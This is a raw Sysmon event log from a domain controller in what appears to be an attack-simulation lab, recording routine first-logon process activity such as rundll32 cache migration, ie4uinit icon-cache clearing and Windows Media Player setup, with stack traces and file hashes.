13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011209Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011208Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-93F6-6005-E604-00000000A301}48881684C:\Windows\system32\csrss.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011207Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-93FF-6005-0105-00000000A301}27923360C:\Windows\System32\ie4uinit.exe{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+176c|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000011206Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.042{59A5CD1D-9400-6005-0305-00000000A301}5028C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492MediumMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 10341000x800000000000000011205Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011204Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011203Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011202Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011201Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011200Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.039{59A5CD1D-93FF-6005-0105-00000000A301}27923360C:\Windows\System32\ie4uinit.exe{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\system32\RunDll32.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Windows\system32\migration\WininetPlugin.dll+2b25|C:\Windows\system32\migration\WininetPlugin.dll+1e44|C:\Windows\system32\migration\WininetPlugin.dll+1743|C:\Windows\System32\ie4uinit.exe+2b3c|C:\Windows\System32\ie4uinit.exe+33b8|C:\Windows\System32\ie4uinit.exe+245e7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000011199Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:24.040{59A5CD1D-9400-6005-0205-00000000A301}3532C:\Windows\System32\rundll32.exe10.0.14393.4169 (rs1_release.210107-1130)Windows host process (Rundll32)Microsoft® Windows® Operating SystemMicrosoft CorporationRUNDLL32.EXEC:\Windows\system32\RunDll32.exe C:\Windows\system32\migration\WininetPlugin.dll,MigrateCacheForUser /m /0C:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=23DB802097F7B7E520E40068A7E68B14,SHA256=28DE7D3E8BF4B19E44063A4BFC2E7C30AE488CD9A1F63320ED374E14AAECA667,IMPHASH=7D1CE1BAFE48B63D9D19E8E0E5DF3E6C{59A5CD1D-93FF-6005-0105-00000000A301}2792C:\Windows\System32\ie4uinit.exeC:\Windows\System32\ie4uinit.exe -ClearIconCache 11241100x800000000000000011223Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.695{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exeC:\Users\Administrator\AppData\Local\Microsoft\Internet Explorer\brndlog.txt2021-01-18 12:24:26.227 10341000x800000000000000011222Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.227{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011221Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:25.227{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-93FF-6005-0005-00000000A301}3080C:\Windows\System32\ie4uinit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.945{59A5CD1D-93FA-6005-FC04-00000000A301}37843160C:\Windows\Explorer.EXE{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e55f|C:\Windows\System32\windows.storage.dll+16e1d5|C:\Windows\System32\windows.storage.dll+16dcc6|C:\Windows\System32\windows.storage.dll+16f138|C:\Windows\System32\windows.storage.dll+16daee|C:\Windows\System32\windows.storage.dll+fd005|C:\Windows\System32\windows.storage.dll+fd384|C:\Windows\System32\windows.storage.dll+fc9c0|C:\Windows\System32\windows.storage.dll+1663de|C:\Windows\System32\windows.storage.dll+1660d2|C:\Windows\System32\SHELL32.dll+8fe71|C:\Windows\System32\SHELL32.dll+8ecd6|C:\Windows\System32\SHELL32.dll+cfbb1|C:\Windows\System32\SHELL32.dll+b5dbe|C:\Windows\System32\SHELL32.dll+551ba4|C:\Windows\System32\SHELL32.dll+551600|C:\Windows\System32\SHELL32.dll+551774|C:\Windows\System32\SHELL32.dll+203065|C:\Windows\System32\SHELL32.dll+8128d|C:\Windows\System32\SHELL32.dll+45f51 154100x800000000000000011240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.952{59A5CD1D-9402-6005-0605-00000000A301}3848C:\Windows\System32\unregmp2.exe12.0.14393.4169 (rs1_release.210107-1130)Microsoft Windows Media Player Setup UtilityMicrosoft® Windows® Operating SystemMicrosoft Corporationunregmp2.exe"C:\Windows\System32\unregmp2.exe" /FirstLogonC:\Windows\system32\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492HighMD5=0AFAF8B10C3D2B009DED280C875EA3EA,SHA256=CFC5A8170AF2CCB8F846BA738E5173596A4C35C023BCE5E6EB04E07779283188,IMPHASH=DFC94E57160B0CE8835243B5D92F3D9E{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.805{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0505-00000000A301}4100C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9402-6005-0505-00000000A301}4100C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000011237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9402-6005-0505-00000000A301}4100C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011234Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:26.789{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011233Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 